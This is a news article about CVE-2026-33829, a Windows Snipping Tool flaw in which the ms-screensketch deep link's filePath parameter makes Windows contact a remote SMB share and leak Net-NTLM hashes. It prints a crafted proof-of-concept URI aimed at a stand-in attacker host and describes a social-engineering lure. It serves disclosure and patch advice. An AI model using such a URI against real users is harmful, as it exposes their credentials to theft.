Tracked as CVE-2026-33829, the issue was discovered by security researcher Margaruga from the BlackArrowSec Red Team and is documented in their redteam-research repository.
The flaw stems from a deep link protocol registered by the Snipping Tool application, identified as ms-screensketch.
This URI schema includes a parameter named filePath, which, when improperly validated, can coerce Windows into connecting to a remote SMB share.
As a result, the user’s Net-NTLM hash is transmitted to the attacker-controlled server.
In essence, the vulnerability enables an NTLM leak and an authentication spoofing scenario where sensitive credentials can be extracted across the network without direct access to the affected system.
Exploiting CVE-2026-33829 requires user interaction; however, even minimal engagement, such as opening a specially crafted link or visiting a malicious webpage, is enough to trigger the issue.
Security analysts at BlackArrowSec demonstrated that opening a crafted URI like:
textms-screensketch:edit?&filePath=\attacker.labimage.png&isTemporary=false&saved=true&source=Toast Forces the Snipping Tool to initiate an SMB connection to the remote address, effectively disclosing the NTLM response from the current Windows account.
The vulnerability offers attackers strong social engineering opportunities. A threat actor could trick users into editing a supposedly legitimate image file, like a company wallpaper or ID photo, via malicious URLs such as:
texthttps://snip.example.com/wallpaper/image.png While it seems to open locally in Snipping Tool, the app silently makes an NTLM authentication attempt in the background, exposing credentials.
Though the flaw requires user interaction, it poses a serious risk on enterprise networks where NTLM hash leakage can lead to impersonation or lateral movement.
Spoofing attacks leveraging NTLM responses often serve as a stepping stone for further credential abuse or privilege escalation.
Microsoft released a security update on April 14, 2026, addressing this vulnerability. Users are strongly advised to apply all patches included in the April 2026 Windows Security Update immediately.
Further information and video proof-of-concept are available in the GitHub advisory and demo file CVE-2026-33829.mp4.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
The post Windows Snipping Tool Vulnerability Allows Attackers to Perform Network Spoofing appeared first on Cyber Security News.
Today's links Tiktokification shall set us free: Zuck keeps accidentally freeing his hostages. Hey look…
Deploying AI models on a dedicated server is the best approach when you need consistent…
Creating visual content used to take hours of tedious work. You had to learn complex…
Advertising is one of the industries where, at first glance, AI seems to be an…
By its very nature, Formula One is an extreme and fast-paced sport, sometimes described as the ‘fastest R&D lab…
Mobile apps are more than simple tools for simple tasks in 2026. These days, users…
This website uses cookies.